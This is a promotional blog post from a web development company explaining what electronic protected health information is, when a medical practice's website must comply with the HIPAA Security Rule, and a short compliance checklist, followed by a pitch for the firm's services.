If you’re a medical professional you are probably familiar with HIPAA or the Health Insurance Portability and Accountability Act of 1996 and the HIPAA Privacy Rule. However, are you familiar with the HIPAA Security Rule? The Security Standards for the Protection of Electronic Protected Health Information establish national security standards that protect the electronic transfer of protected health information, also known as e-PHI. As more medical professionals and healthcare offices are building websites online, it is important to understand what e-PHI is, how to determine if your site needs to be HIPAA-compliant and the requirements a site must meet in order to be considered a HIPAA-compliant website.
What is e-PHI?
According to the U.S. Department of Health & Human Services, Electronic Protected Health Information (e-PHI) refers to “all individually identifiable health information a covered entity creates, receives, maintains or transmits in electronic form.” What does that mean? If you are a practice that transmits any patient data via your medical website, that’s e-PHI.
This can include:
- Patient names, addresses, phone numbers, social security numbers
- Patient photographs, X-Rays, MRIs
- Past medical records
- Patient payment information and insurance data
- Patient demographics
- Tests and lab results
Does my website need to be HIPAA-compliant?
If you collect any of the above information via your website, yes you need to have a HIPAA-compliant website. You might collect this information through forms on your medical website, allowing patients to schedule appointments, contact their doctor with questions, make payments or send in medical records. The bottom line is if you’re handling any patient data through your website, you MUST have a HIPAA-compliant website or you will be violating the HIPAA Security Rule. Even if you are not collecting patient data, you should highly consider making your website HIPAA-compliant. That’s because sites with HIPAA-compliant website hosting (hosted on servers that meet the requirements of the HIPAA Security Rule) are also more secure, and can prevent hackers from inserting fake forms on the site to collect patient data such as social security numbers.
How do I know if my site meets the standards of the HIPAA Security Rule?
If you can answer yes to all of the questions below, your medical site probably meets the standards of the HIPAA Security Rule.
- Does your site have automatic backups that are never lost and can be recovered at any time?
- Is all data transmitted from your site, over the Internet, encrypted?
- Is your stored data also encrypted?
- Is your website data accessible only by authorized persons with unique permissions that can be audited?
- If your site is no longer needed, can it be permanently deleted?\
- Do you have a HIPAA Business Associate Agreement with the company that currently hosts your website? If not, does the server that hosts your website meet the rules and requirements of the HIPAA Security Rule?
Ready to Get Started?
Comit Developers is well-versed in the requirements surrounding the HIPAA Security Rule and our team has put in countless hours researching the best solutions available in order to provide our healthcare clients with secure, HIPAA-compliant websites. As a result, we have successfully launched several sites in the medical industry for doctors, surgeons and providers of medical equipment utilizing HIPAA-compliant servers. In addition, several members of our team have taken the time to research and stay updated with the HIPAA Privacy and Security Rules.
To work with a professional team, well-versed in providing HIPAA-compliant websites, call us at 337-326-5479 to get started!